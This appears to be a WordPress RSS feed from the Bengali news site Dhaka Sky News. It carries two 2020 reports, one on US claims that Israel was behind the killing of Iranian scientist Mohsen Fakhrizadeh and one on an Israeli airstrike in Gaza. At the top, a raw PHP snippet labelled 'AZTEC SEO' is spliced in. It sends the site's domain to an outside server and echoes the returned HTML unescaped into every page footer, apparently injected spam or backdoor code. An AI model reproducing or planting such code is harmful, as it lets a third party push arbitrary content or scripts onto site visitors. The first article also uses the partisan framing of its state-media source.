/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); ইসরাইল – Dhaka Sky News https://www.dhakaskynews.com Dhaka Sky News Thu, 03 Dec 2020 09:08:32 +0000 en-US hourly 1 https://wordpress.org/?v=6.9.9 ইরানের বিজ্ঞানী হত্যাকাণ্ডের পেছনে রয়েছে ইসরাইল: মার্কিন কর্মকর্তা https://www.dhakaskynews.com/international/2020/12/03/News_ID-1238/ https://www.dhakaskynews.com/international/2020/12/03/News_ID-1238/#respond Thu, 03 Dec 2020 09:08:32 +0000 https://www.dhakaskynews.com/?p=1238 আমেরিকার একজন শীর্ষ পর্যায়ের সরকারি কর্মকর্তারা স্বীকার করেছেন যে, গত শুক্রবার ইসলামি প্রজাতন্ত্র ইরানের শীর্ষ পর্যায়ের পরমাণু বিজ্ঞানী মোহসেন ফাখরিজাদে হত্যাকাণ্ডের পেছনে ইহুদিবাদী ইসরাইল জড়িত রয়েছে। মার্কিন টেলিভিশন চ্যানেল সিএনএন গতকাল (বুধবার) এ খবর দিয়েছে।

ইসরাইল এই হত্যাকাণ্ডের পেছনে থাকলেও ডোনাল্ড ট্রাম্পের প্রশাসন বিষয়টি আগেই জানত কিনা সে বিষয়ে বিস্তারিত কিছু জানাতে অস্বীকার করেন ওই কর্মকর্তা।

সিএনএনএ’র রিপোর্টে বলা হয়েছে, “সরকারি কর্মকর্তা বলেন, অতীতে বহুবার ইসরাইল তাদের লক্ষ্য এবং অপারেশন চালানো সম্পর্কে নানা তথ্য আমেরিকার সঙ্গে শেয়ার করেছে কিন্তু এ দফায় তা করেছে কি না তিনি তা বলে নি। ইরানের এ পরমাণু বিজ্ঞানীকে বহু আগে থেকেই টার্গেট করা হয়েছিল।”

সিএনএন’র ওই রিপোর্টে আরো বলা হয়েছে, মার্কিন প্রেসিডেন্ট ডোনাল্ড ট্রাম্প পররাষ্ট্রমন্ত্রী মাইক পাম্পেওকে নির্দেশ দিয়েছেন যে, ইরানের ওপর আগামী দুই মাস সর্বোচ্চ চাপ প্রয়োগের নীতি জোরদার করতে হবে।

নাম প্রকাশে অনিচ্ছুক আমেরিকার ওই কর্মকর্তা আরো বলেন, ইরানি বিজ্ঞানী হত্যার ঘটনা তেহরানের সঙ্গে জো বাইডেনের নতুন প্রশাসনের কূটনৈতিক তৎপরতা শুরুর ক্ষেত্রে বাধা সৃষ্টি করতে পারে। সূত্র : পার্সটুডে

ঢাকা স্কাইনিউজ/এস এম দৌলত

]]>
https://www.dhakaskynews.com/international/2020/12/03/News_ID-1238/feed/ 0
গাজায় হামাসের অবস্থানে ইসরাইলের বিমান হামলা https://www.dhakaskynews.com/international/2020/06/28/News_ID-601/ https://www.dhakaskynews.com/international/2020/06/28/News_ID-601/#respond Sat, 27 Jun 2020 19:39:08 +0000 https://www.dhakaskynews.com/?p=601 ফিলিস্তিনের গাজা উপত্যকায় হামাসের অবস্থান লক্ষ্য করে ইসরাইল বিমান হামলা চালিয়েছে। এর আগে শুক্রবার গাজা উপত্যকা থেকে ইসরাইলে রকেট হামলা চালানো হয়। ইসরাইলের সেনা সূত্র থেকে এমনটি জানানো হয়েছে।

এদিকে ইসরাইলকে লক্ষ্য করে রকেট হামলা চালানোর আগে হামাস অধিকৃত পশ্চিম তীরে ইসরাইলের বসতি সম্প্রসারণ পরিকল্পনাকে যুদ্ধ ঘোষণার শামিল বলে সতর্ক করেছে।

সেনা সূত্র জানায়, ইসরাইলের বিমান গাজা উপত্যাকার দক্ষিণাঞ্চলে এ হামলা চালিয়েছে। গাজার নিরাপত্তা সূত্রও এ হামলার সত্যতা স্বীকার করে বলেছে, ইসরাইলী বিমান গাজা উপত্যকার দক্ষিণাঞ্চলের খান ইউনুসে এ হামলা চালিয়েছে।

উল্লেখ্য, ইসরাইল ১ জুলাই থেকে পশ্চিম তীরে বসতি সম্প্রসারণের কাজ শুরুর ঘোষণা দিয়েছে। জাতিসংঘসহ বিশ্বের অনেক দেশ এর বিরোধিতা করে বলেছে, এতে মধ্যপ্রাচ্যে ভবিষ্যত শান্তি স্থাপনের কাজ ব্যাহত হবে। কিন্তু যুক্তরাষ্ট্র ইসরাইলকে এ কাজে সবুজ সংকেত দিয়েছে।

]]>
https://www.dhakaskynews.com/international/2020/06/28/News_ID-601/feed/ 0